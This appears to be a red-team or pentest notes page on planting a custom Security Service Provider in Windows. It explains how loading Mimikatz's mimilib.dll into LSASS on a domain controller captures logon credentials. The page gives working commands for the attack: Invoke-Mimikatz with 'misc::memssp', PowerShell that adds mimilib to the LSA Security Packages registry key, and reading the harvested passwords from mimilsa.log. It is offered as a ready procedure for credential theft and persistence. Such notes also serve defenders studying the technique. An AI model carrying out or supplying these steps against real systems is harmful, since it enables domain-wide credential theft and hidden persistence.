Custom Security Service Providers (SSP's)
A Security Service Provider is an API which allows for authenticated connections.
Standard SSP's include:
NTLM
Kerberos
Negotiate
Secure Channel (Schannel)
Digest
Credential (CredSSP)
Upon startup, the computer loads the SSP DLL's. This allows attackers to drop their own custom DLL's which will load upon the next machine startup. This may allow us to capture credentials to use to further persist in the network.
Mimikatz provides its own custom DLL (mimilib.dll) which we can use as an example.
Injecting the Custom DLL
Requires Domain Admin privileges and must be performed on the DC.
Method 1 - Using Mimikatz
Note: this does not work very well on Server 2016
Invoke-Mimikatz -Command '"misc::memssp"'
Method 2 - Drop mimilib.dll into system32 and add mimilib to the security packages
# Step 1 - Add mimilib.dll to C:\Windows\system32
# Step 2
$packages = Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages'| select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name
'Security Packages' -Value $packages
# Then check HKEY_Local_Machine\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig in regedit to confirm the addition
Check the log files for creds
# either mimilsa.log or kiwissp.log depending on the attack
# I believe it's mimilsa.log if you use Mimikatz, kiwissp.log if you manually drop the DLL
type c:\windows\system32\mimilsa.log
Last updated